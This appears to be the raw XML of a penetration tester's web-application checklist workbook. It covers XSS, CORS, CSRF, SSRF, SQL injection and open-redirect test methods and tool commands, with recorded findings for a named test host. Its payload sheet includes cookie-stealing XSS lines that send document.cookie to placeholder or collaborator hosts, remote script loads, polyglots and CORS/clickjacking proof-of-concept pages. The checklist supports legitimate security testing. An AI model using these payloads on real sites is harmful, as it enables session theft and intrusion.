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eyindia-my.sharepoint.com/personal/aju_thomas1_in_ey_com/Documents/Desktop/My Work/Pentesting Assignments/Templates/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="1734" documentId="11_F25DC773A252ABDACC1048AF591B5FD45BDE58EF" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{4E878B53-47AA-415E-9639-78488FE3768E}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="19420" windowHeight="10420" tabRatio="415" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Web Application - Checklist" sheetId="1" r:id="rId1"/>
    <sheet name="Payloads" sheetId="2" r:id="rId2"/>
    <sheet name="XSS Polyglot Payloads" sheetId="6" r:id="rId3"/>
    <sheet name="DOM (Source - Sink)" sheetId="3" r:id="rId4"/>
  </sheets>
  <definedNames>
    <definedName name="ExternalData_1" localSheetId="2" hidden="1">'XSS Polyglot Payloads'!$A$2:$A$10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96B8CF-6537-4EA5-867E-6A72E8100DCB}" keepAlive="1" name="Query - XSS Polyglot Payloads" description="Connection to the 'XSS Polyglot Payloads' query in the workbook." type="5" refreshedVersion="0" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=&quot;XSS Polyglot Payloads&quot;;Extended Properties=&quot;&quot;" command="SELECT * FROM [XSS Polyglot Payloads]"/>
  </connection>
  <connection id="2" xr16:uid="{F46DBB4F-7B63-4424-B91E-6C7CE7660B80}" keepAlive="1" name="Query - XSS Polyglot Payloads (2)" description="Connection to the 'XSS Polyglot Payloads (2)' query in the workbook." type="5" refreshedVersion="7" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=&quot;XSS Polyglot Payloads (2)&quot;;Extended Properties=&quot;&quot;" command="SELECT * FROM [XSS Polyglot Payloads (2)]"/>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="711" uniqueCount="286">
  <si>
    <t>Scope IP</t>
  </si>
  <si>
    <t>Scope Domain</t>
  </si>
  <si>
    <t>Date of Commencement</t>
  </si>
  <si>
    <t>Remarks</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Not required</t>
  </si>
  <si>
    <t xml:space="preserve">                                                                                                                                Web Application Checklist</t>
  </si>
  <si>
    <t>Clickjacking</t>
  </si>
  <si>
    <t>Methodologies</t>
  </si>
  <si>
    <t>Manual Exploit</t>
  </si>
  <si>
    <t>Not Started</t>
  </si>
  <si>
    <t>Cross Origin Resource Sharing (CORS)</t>
  </si>
  <si>
    <t>Corsy Tool</t>
  </si>
  <si>
    <t>Command Injection</t>
  </si>
  <si>
    <t>Commix</t>
  </si>
  <si>
    <t xml:space="preserve">Manual Exploits </t>
  </si>
  <si>
    <t>Manual Exploits - Javascripts</t>
  </si>
  <si>
    <t>Cross Site Scripting - Reflected</t>
  </si>
  <si>
    <t>Cross Site Scripting - Stored</t>
  </si>
  <si>
    <t>Cross Site Scripting - DOM</t>
  </si>
  <si>
    <t>Cross Site Scripting - Blind XSS</t>
  </si>
  <si>
    <t>Passed</t>
  </si>
  <si>
    <t>Failed</t>
  </si>
  <si>
    <t>Not Required</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>Check if the user supplied input is getting reflected in the response/URL/page source</t>
  </si>
  <si>
    <t>CSRF</t>
  </si>
  <si>
    <t>SSRF</t>
  </si>
  <si>
    <t>SQL Injection</t>
  </si>
  <si>
    <t>SQL Map</t>
  </si>
  <si>
    <t>Broken Authorization/IDOR</t>
  </si>
  <si>
    <t>Manual Exploits - Javascripts 1</t>
  </si>
  <si>
    <t>Vulnerability</t>
  </si>
  <si>
    <t>Payload</t>
  </si>
  <si>
    <t>Scenario</t>
  </si>
  <si>
    <t>&lt;svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"&gt;
&lt;circle cx="5" cy="5" r="5" stroke-width="5" fill="white" /&gt;
&lt;foreignObject width="1920" height="1080"&gt; &lt;body
xmlns="http://www.w3.org/1999/xhtml"&gt; &lt;center&gt;&lt;h1&gt;Example XSS/Phishing
Exploit&lt;/h1&gt;&lt;/center&gt; &lt;/body&gt; &lt;script&gt;alert(document.domain)&lt;/script&gt;
&lt;/foreignObject&gt; &lt;/svg&gt;</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS)</t>
  </si>
  <si>
    <t>File Upload ( File name manipulation using Burpsuite)</t>
  </si>
  <si>
    <t>File Upload  (File content). Save as a svg file and upload it</t>
  </si>
  <si>
    <t>HTML Injection</t>
  </si>
  <si>
    <t>If user supplied input is getting reflected back in the application response</t>
  </si>
  <si>
    <t>&lt;h1&gt;Hello World &lt;/h1&gt;</t>
  </si>
  <si>
    <t>%3Ch1%3EHello%20World%3C%2Fh1%3E</t>
  </si>
  <si>
    <t>URL encoding</t>
  </si>
  <si>
    <t>Save it as a HTML Page and open it in a browser to see if the website is loading in an Iframe</t>
  </si>
  <si>
    <t>Payload All things</t>
  </si>
  <si>
    <t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection</t>
  </si>
  <si>
    <t>Open Redirection</t>
  </si>
  <si>
    <t>Check Payload Sheet</t>
  </si>
  <si>
    <t>Payload Used</t>
  </si>
  <si>
    <t>Normal HTML Payload</t>
  </si>
  <si>
    <t>Encoded HTML Payload</t>
  </si>
  <si>
    <t>Open Redirection  ( Patterns)</t>
  </si>
  <si>
    <t>Check Payload All things github page and Use Burp Intruder for different patterns</t>
  </si>
  <si>
    <t>Same Parameters Twice</t>
  </si>
  <si>
    <t>Usage of IP address</t>
  </si>
  <si>
    <t>Style Digit Symbols</t>
  </si>
  <si>
    <t>File Upload Redirect</t>
  </si>
  <si>
    <t>Check Payloads sheet</t>
  </si>
  <si>
    <t>Open Redirection (File Upload)</t>
  </si>
  <si>
    <t>Save the file as .svg type and upload it</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;script&gt;
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 &amp;&amp; this.status == 200) {
document.getElementById("emo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET", "{URL}", true);
xhttp.withCredentials = true;
xhttp.send();
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;center&gt;
&lt;h2&gt;CORS PoC Exploit &lt;/h2&gt;
&lt;h3&gt;Show full content of page&lt;/h3&gt;
&lt;div id="demo"&gt;
&lt;button type="button" onclick="cors()"&gt;Exploit&lt;/button&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Save it as a HTML page and open it in a browser </t>
  </si>
  <si>
    <t>Manual Exploit (Check for CORS headers conditons)</t>
  </si>
  <si>
    <t>CORS Prefix/Postfix/Substring  Match</t>
  </si>
  <si>
    <t>CSRF PoC Generator</t>
  </si>
  <si>
    <t>Token Validation ( Tamper the token value and check if it is getting validated)</t>
  </si>
  <si>
    <t>Normal CSRF ( Instance where CSRF token is not present)</t>
  </si>
  <si>
    <t>Reusal of Same token ( No Token Validation)</t>
  </si>
  <si>
    <t>Change of Request Method ( from POST to GET)</t>
  </si>
  <si>
    <t>XSS in CSRF</t>
  </si>
  <si>
    <t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>Token not tied to Session Cookie ( Remove the existing token and replace it with another token)</t>
  </si>
  <si>
    <t>Removal of CSRF token from the request (remove CSRF token from the request body)</t>
  </si>
  <si>
    <t>Access to localhost ( Try both 127.0.0.1:80 &amp; localhost:80) by replacing the parameter value (Check Common Parameter list for SSRF)</t>
  </si>
  <si>
    <t>Access localhost using "http://[::]:80/</t>
  </si>
  <si>
    <t>Usage of Decimal Ips</t>
  </si>
  <si>
    <t>Short Hand IP address</t>
  </si>
  <si>
    <t>SSRF File Upload ( Use Burp Collaborator Client)</t>
  </si>
  <si>
    <t>SSRF - File Upload</t>
  </si>
  <si>
    <t>&lt;svg svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org.2000/svg"
xlink="http://www.w3.org/1999/xlink" width="200" height="200"&gt;
&lt;image height="30" width="30" href="https://&lt;Any-Server&gt;" /&gt;
&lt;polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/&gt; &lt;/svg&gt;</t>
  </si>
  <si>
    <t>Save the file as. Svg file and replace the server URL with Burp collaborator client URL</t>
  </si>
  <si>
    <t>DNS Rebinding</t>
  </si>
  <si>
    <t>N.A</t>
  </si>
  <si>
    <t>Security Headers</t>
  </si>
  <si>
    <t>Manual Exploits - Parameters/Delimiters</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>X-Forwarded-Server</t>
  </si>
  <si>
    <t>X-HTTP-Host-Override-Forwarded</t>
  </si>
  <si>
    <t>Security Misconfigurations</t>
  </si>
  <si>
    <t>Missing HTTPOnly Flag in HTTP Request ( Insecure Cookie Setting)</t>
  </si>
  <si>
    <t>Set-Cookie: HttpOnly</t>
  </si>
  <si>
    <t>X-XSS-Protection Security Header</t>
  </si>
  <si>
    <t>X-XSS-Protection:1;mode=block</t>
  </si>
  <si>
    <t>Insecure Cookie Setting - Missing Secure Flag</t>
  </si>
  <si>
    <t>DMARC Record</t>
  </si>
  <si>
    <t>https://mxtoolbox.com/DMARC.aspx</t>
  </si>
  <si>
    <t>SPF Record Configuration</t>
  </si>
  <si>
    <t>https://www.kitterman.com/spf/validate.html</t>
  </si>
  <si>
    <t>Vulnerable URL/Endpoint</t>
  </si>
  <si>
    <t>Cookie Editor Add-on</t>
  </si>
  <si>
    <t>Email verification for New users</t>
  </si>
  <si>
    <t>Password Policy ( Character limit, Min and Max , Special Symbols)</t>
  </si>
  <si>
    <t>Broken Authentication</t>
  </si>
  <si>
    <t>Rate Limit/ Account Lockout Mechanism</t>
  </si>
  <si>
    <t>Presence of MFA</t>
  </si>
  <si>
    <t>Sensitive Data Exposure</t>
  </si>
  <si>
    <t>Profile picture upload ( Stripping of EXIF Data)</t>
  </si>
  <si>
    <t>EXIF tool ( http://exif.regex.info/exif.cgi)</t>
  </si>
  <si>
    <t>Input Validations</t>
  </si>
  <si>
    <t>Unrestricted File Uploads</t>
  </si>
  <si>
    <t>Uploding file of any size/extension</t>
  </si>
  <si>
    <t>using UNION keywords</t>
  </si>
  <si>
    <t>Payload &amp; Delimiters Used</t>
  </si>
  <si>
    <t>XSS Hunter - Payloads</t>
  </si>
  <si>
    <t>SQLI in Referrer Header- (Refer Payload All things Github)</t>
  </si>
  <si>
    <t>SQLI in User Agents ((Refer Payload All things Github))</t>
  </si>
  <si>
    <t>Blind SQLI</t>
  </si>
  <si>
    <t>WAF bypass</t>
  </si>
  <si>
    <t xml:space="preserve">Set-Cookie: Secure </t>
  </si>
  <si>
    <t>Session Cookies not getting expired</t>
  </si>
  <si>
    <t>SSRFire (Automated Tool)</t>
  </si>
  <si>
    <t>Check for SSRF Parameters Cheatsheet</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Refer Parameters Cheatsheet
Parameters : </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>?id = {payload},  ?page={payload}, ?dir={payload}, ?search={payload}, ?category={payload}, ?class={payload}
?file={payload}, ?url={payload}, ?news={payload}, ?item={payload}, ?menu={payload}, ?name={payload}, ?ref={payload}, ?title={payload}, ?view={payload}, ?topic={payload}, ?thread={payload}, ?type={payload}, ?date={payload}, ?thread={payload}, ?type={payload}, ?join={payload}, ?main={payload}, ?region={payload}, ?nav={payload}, ?form={payload}</t>
    </r>
  </si>
  <si>
    <t>Burp Intruder</t>
  </si>
  <si>
    <t xml:space="preserve">N.A </t>
  </si>
  <si>
    <t>Presence of HTTP Strict Transport Security Header</t>
  </si>
  <si>
    <t>sqlmap -u "URL" --dbs --batch --banner</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
	&lt;title&gt;Clickjacking-Exploit&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
 &lt;iframe src="URL" width="500" height="500"&gt;&lt;/iframe&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>Parameter Manipulation ( url, uri, navigate, dir, site, next, file, filename, host, feed, r, dest, path)</t>
  </si>
  <si>
    <t>Patterns ( ///, //, @, #, PayloadAll Things (Github)</t>
  </si>
  <si>
    <t>https://woohoosclptest1.qwikcilver.com/Egms_Security/QwikHomeLatest/QwikHome/Security/login?OKEY=SvaR9eANu2ClBc9RIuh1iDrI4YdaIj</t>
  </si>
  <si>
    <t>HSTS header is present</t>
  </si>
  <si>
    <t>Concurrent sessions</t>
  </si>
  <si>
    <t>During the assessment, we observed that the application can be accessed concurrently from multiple sessions/systems using the same account.</t>
  </si>
  <si>
    <t>Secure flag is set</t>
  </si>
  <si>
    <t>Http Only flag is set</t>
  </si>
  <si>
    <t>Session Cookies not getting expired after logout</t>
  </si>
  <si>
    <t>https://woohoosclptest1.qwikcilver.com/Egms_Security/QwikHomeLatest/QwikHome/</t>
  </si>
  <si>
    <t>Session is still in use in another window if we logged out from one window.</t>
  </si>
  <si>
    <t>https://securityheaders.com</t>
  </si>
  <si>
    <t>&lt;code&gt; &lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt; svg
onload="window.location='http://evil.com'"
xmlns="http://www.w3.org/2000/svg" &lt;/svg&gt; &lt;/code&gt;</t>
  </si>
  <si>
    <t>X-XSS-Protection Header is missing</t>
  </si>
  <si>
    <t>Session cookie is getting expired after a certain amount of time</t>
  </si>
  <si>
    <t>No Issues found</t>
  </si>
  <si>
    <t>No Issues found. Application gets signed out automatically when HTML characters are entered in the user supplied input fields. URL encoded and double URL encoded tags are interpreted as normal text strings and it did not trigger XSS</t>
  </si>
  <si>
    <t>No Issues found for the used payloads</t>
  </si>
  <si>
    <t>Account gets locked out for 30 minutes when multiple attempts of incorect passwords are entered</t>
  </si>
  <si>
    <t>Payloads Sheet</t>
  </si>
  <si>
    <t>Modifying the value of the Host Header</t>
  </si>
  <si>
    <t>No redirection exists</t>
  </si>
  <si>
    <t>No redirection exists. Does not support the upload of svg file</t>
  </si>
  <si>
    <t>X-Forwarded-Host: &lt;domain_name&gt;</t>
  </si>
  <si>
    <t>X-Forwarded-Server: &lt;domain_name&gt;</t>
  </si>
  <si>
    <t>X-Host: &lt;domain_name&gt;</t>
  </si>
  <si>
    <t>X-HTTP-Host-Override-Forwarded: &lt;domain_name&gt;</t>
  </si>
  <si>
    <t>No parameters found</t>
  </si>
  <si>
    <t>PayloadAll Things (Github) using Burp Intruder</t>
  </si>
  <si>
    <t>%3cimg src=x onerror=prompt(1)%3e</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Few of the security headers are missing. Please refer </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF0070C0"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Clickjacking</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> for more details</t>
    </r>
  </si>
  <si>
    <r>
      <t>Issue found to exist in a file upload functionality. A file name containing a HTML tag throws HTMLI when it is uploaded.  Please refer</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0070C0"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF0070C0"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>HTMLI</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> for more details</t>
    </r>
  </si>
  <si>
    <t>python3 corsy.py -u https://woohoosclptest1.qwikcilver.com/Egms_Security/QwikHomeLatest/QwikHome/Security/login?OKEY=SvaR9eANu2ClBc9RIuh1iDrI4YdaIj</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=prompt(1)&gt;
&lt;script&gt;alert(1) &lt;/script&gt;
%3cimg src=x onerror=prompt(1)%3e
%3cimg%20src=x%20onerror=prompt(1)%3e
PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==
javascript:alert(1)</t>
  </si>
  <si>
    <t>b0x.mannulinux.org</t>
  </si>
  <si>
    <t>http://[::]:80/</t>
  </si>
  <si>
    <t>http://213070643</t>
  </si>
  <si>
    <t>http://127.1</t>
  </si>
  <si>
    <t>No Parameters mentioned in the cheatsheet were found in the application</t>
  </si>
  <si>
    <t>MFA is not enforced in the application</t>
  </si>
  <si>
    <t>Informational</t>
  </si>
  <si>
    <t>.svg file extension</t>
  </si>
  <si>
    <t>A validation is put in place and it accepts files of certain extension only</t>
  </si>
  <si>
    <t>Yet to check few more input fields</t>
  </si>
  <si>
    <t xml:space="preserve">Password is meeting all the required conditions. </t>
  </si>
  <si>
    <t>Secure connection over HTTPS</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>A secure connection issue is found to exist in the application. Please refer</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF0070C0"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Secure Connection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> for more details</t>
    </r>
  </si>
  <si>
    <t>python3 commix.py -u &lt;URL&gt;</t>
  </si>
  <si>
    <t>No Functionality is present</t>
  </si>
  <si>
    <t>The domain URL mentioned corresponding to the origin header in the request is getting reflected in the response section corresponding to Access-Control-Allow-Origin header but we were unable to exploit the CORS. Please refer CORS for further information</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">The domain URL mentioned corresponding to the origin header in the request is getting reflected in the response section corresponding to Access-Control-Allow-Origin header but we were unable to exploit the CORS. Please refer </t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF0070C0"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>CORS</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> for further information</t>
    </r>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>DMARC record found. Domain is not found to be spoofable</t>
  </si>
  <si>
    <t>SPF record was not found</t>
  </si>
  <si>
    <t>CRLF Injection</t>
  </si>
  <si>
    <t>CRLF Suite Scanner</t>
  </si>
  <si>
    <t>crlfsuite -u "target-url"</t>
  </si>
  <si>
    <t>Open RedireX</t>
  </si>
  <si>
    <t>python3 openredirex.py -u "https://example.com/?url=FUZZ" -p payloads.txt --keyword FUZZ</t>
  </si>
  <si>
    <t>PwnSSRF</t>
  </si>
  <si>
    <t>python3 pwnssrf.py -H &lt;target-url&gt;</t>
  </si>
  <si>
    <t>XSRFProbe</t>
  </si>
  <si>
    <t>xsrfprobe -u &lt;target-url&gt;</t>
  </si>
  <si>
    <t>Application Name</t>
  </si>
  <si>
    <t xml:space="preserve">                                                                                                                                                                                                      Vulnerability Listings</t>
  </si>
  <si>
    <t>No Clickjacking was found to be possible</t>
  </si>
  <si>
    <t>Host Header Injection (Also check in Forget email feature)</t>
  </si>
  <si>
    <t>X-Forwarded-Host</t>
  </si>
  <si>
    <t>X-Host</t>
  </si>
  <si>
    <t>X-Forwarded-For</t>
  </si>
  <si>
    <t>&lt;script&gt;$.getScript("//newmanborn007.xss.ht")&lt;/script&gt;
"%3e%3cscript src=https://newmanborn007.xss.ht/%3e%3c%2fscript%3e
"&gt;&lt;script src=https://newmanborn007.xss.ht&gt;&lt;/script&gt;
 "&gt;&lt;img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbWRtZGRtbS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))&gt;</t>
  </si>
  <si>
    <t>TPL Map</t>
  </si>
  <si>
    <t>Server Side Template Injection</t>
  </si>
  <si>
    <t>Web Application Vulnerability Scanner</t>
  </si>
  <si>
    <t>Wapiti</t>
  </si>
  <si>
    <t>wapiti -u https://example.com/</t>
  </si>
  <si>
    <t>./tplmap.py -u 'http://www.target.com/page?url=value'</t>
  </si>
  <si>
    <t>Broken Link Hijacking (BLH)</t>
  </si>
  <si>
    <t>Broken Link Checker (broken-link-checker)</t>
  </si>
  <si>
    <t>blc -rof --filter-level 3 https://target.com
blc -rfoi --exclude linkedin.com --exclude youtube.com (To avoid false positives)</t>
  </si>
  <si>
    <t xml:space="preserve">Dead Link checker </t>
  </si>
  <si>
    <t>https://www.deadlinkchecker.com/</t>
  </si>
  <si>
    <t xml:space="preserve">XSS in Request Header (eg : Referer Header) </t>
  </si>
  <si>
    <t>XSS in Cache/User agent</t>
  </si>
  <si>
    <t>curl https://example.com?&lt;arbitrary-keyword&gt; -I -H "xss:&lt;svg onload=alert(1)&gt;"</t>
  </si>
  <si>
    <t>XSS in Email address validator field</t>
  </si>
  <si>
    <t>"&gt;&lt;svg/onload=confirm(1)&gt;"@email-domain.com</t>
  </si>
  <si>
    <t>Base 64 + URL encoding to Bypass XSS Protection header</t>
  </si>
  <si>
    <t>https://example.com'-confirm(1)-'</t>
  </si>
  <si>
    <t xml:space="preserve">                                                                                DOM Source - Sink List</t>
  </si>
  <si>
    <t>Sources List</t>
  </si>
  <si>
    <t>Sink List</t>
  </si>
  <si>
    <t>document.URL</t>
  </si>
  <si>
    <t>eval</t>
  </si>
  <si>
    <t>document.referrer</t>
  </si>
  <si>
    <t>setTimeout</t>
  </si>
  <si>
    <t>location</t>
  </si>
  <si>
    <t>setInterval</t>
  </si>
  <si>
    <t>location.href</t>
  </si>
  <si>
    <t>document.write</t>
  </si>
  <si>
    <t>element.innerHTML</t>
  </si>
  <si>
    <t>location.search</t>
  </si>
  <si>
    <t>location.hash</t>
  </si>
  <si>
    <t>location.pathname</t>
  </si>
  <si>
    <t>DOM(Source-Sink) List</t>
  </si>
  <si>
    <t>&lt;&lt;Back</t>
  </si>
  <si>
    <t>Fin-DOM XSS</t>
  </si>
  <si>
    <t>./findom-xss.sh https://target.com/target.php</t>
  </si>
  <si>
    <t>&lt;a href="javascript:alert(1)" onmouseover=alert(1)&gt; Hover me &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onmouseover="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">1. ///
2. @
3. /
4 //
</t>
  </si>
  <si>
    <t>&lt;img src=x onmousemove="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onmouseout="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onmouseup="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onmousewheel="alert(String.fromCharCode(88,83,83))"&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;document.location.href="http://evil.com"&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;a href="http://evil.com"&gt; Click me &lt;/a&gt;</t>
  </si>
  <si>
    <t>Addition of own parameters in request section, eg: ?q=&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>XSS Polyglot Payloads</t>
  </si>
  <si>
    <t>Column1</t>
  </si>
  <si>
    <t>â€œ</t>
  </si>
  <si>
    <t>'&gt;&gt;&lt;marquee&gt;&lt;img src=x onerror=confirm(1)&gt;&lt;/marquee&gt;&gt;&lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/onmouseover=prompt(1)&gt;&lt;script&gt;prompt(1)&lt;/script&gt;@gmail.com&lt;isindex</t>
  </si>
  <si>
    <t>javascript://--&gt;&lt;/script&gt;&lt;/title&gt;&lt;/style&gt;/&lt;/textarea&gt;*/&lt;alert()/*' onclick=alert()//&gt;a_x000D_
javascript://&lt;/title&gt;/&lt;/script&gt;&lt;/style&gt;&lt;/textarea/--&gt;*/&lt;alert()/*'</t>
  </si>
  <si>
    <t>javascript://&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;--&gt;&lt;/script&gt;&lt;a//' onclick=alert()//&gt;*/alert()/*_x000D_
javascript://'//</t>
  </si>
  <si>
    <t>javascript://&lt;/title&gt;&lt;/textarea&gt;&lt;/style&gt;&lt;/script</t>
  </si>
  <si>
    <t>--&gt;&lt;/script&gt;&lt;/title&gt;&lt;/style&gt;/&lt;/textarea&gt;&lt;a' onclick=alert()//&gt;*/alert()/*_x000D_
/&lt;/title/'/&lt;/style/&lt;/script/&lt;/textarea/--&gt;&lt;p</t>
  </si>
  <si>
    <t>javascript://--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;svg</t>
  </si>
  <si>
    <t>jaVasCript:/*-/*`/*\`/*'/*/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>Polygot attack using Burp Intruder ( Find parameter)</t>
  </si>
  <si>
    <t>&lt;script&gt;document.location.href="http://x.x.x.x:1234/cookie="+document.cookie&lt;/script&gt;</t>
  </si>
  <si>
    <t>Cookie Stealing</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=this.src='http://burp-collaborator-url?c='+document.cookie&gt;</t>
  </si>
  <si>
    <t>&lt;svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/&gt;</t>
  </si>
  <si>
    <t>File Upload  (File content). Save as a svg file and upload it (Stored XSS) look for the file uploaded</t>
  </si>
  <si>
    <t>Manipulation of EXIF  Metadata</t>
  </si>
  <si>
    <t>File Upload functionality ( manipulation of EXIF data)</t>
  </si>
  <si>
    <t>1. exiftool &lt;file-name&gt;
2. exiftool -Artist ' "&gt;&lt;img src=x onerror=prompt(1)&gt;' &lt;file-name&gt;</t>
  </si>
  <si>
    <t>File Uplaod functionality through normal HTML file. Save the file .html</t>
  </si>
  <si>
    <t>&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=prompt(1)&gt;.png
&lt;svg onload=alert(1)&gt;
&lt;script&gt;alert(1)&lt;/script&gt;
"&gt;&lt;svg/onload=alert(document.domain)&gt;</t>
  </si>
  <si>
    <t>https://www.target.com/"onmouseover="javascript:prompt()"</t>
  </si>
  <si>
    <t>https://target.com?parameter="onmousemove=alert("XSS")"</t>
  </si>
  <si>
    <t>https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt</t>
  </si>
  <si>
    <t>XSS Payloads</t>
  </si>
  <si>
    <t>http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate</t>
  </si>
  <si>
    <t>XSS Email Validator</t>
  </si>
  <si>
    <t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Intruders/XSS_Polyglots.txt</t>
  </si>
  <si>
    <t>&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt” remove the underscores.</t>
  </si>
  <si>
    <t>HTTP Request Smuggling</t>
  </si>
  <si>
    <t>Smuggler</t>
  </si>
  <si>
    <t>python3 smuggler.py -u &lt;URL&gt;</t>
  </si>
  <si>
    <t>https://github.com/stevenvachon/broken-link-checker</t>
  </si>
  <si>
    <t>curl -v &lt;target-url&gt;</t>
  </si>
  <si>
    <t>Old session expiry after Password reset</t>
  </si>
  <si>
    <t xml:space="preserve">Session Fixation </t>
  </si>
  <si>
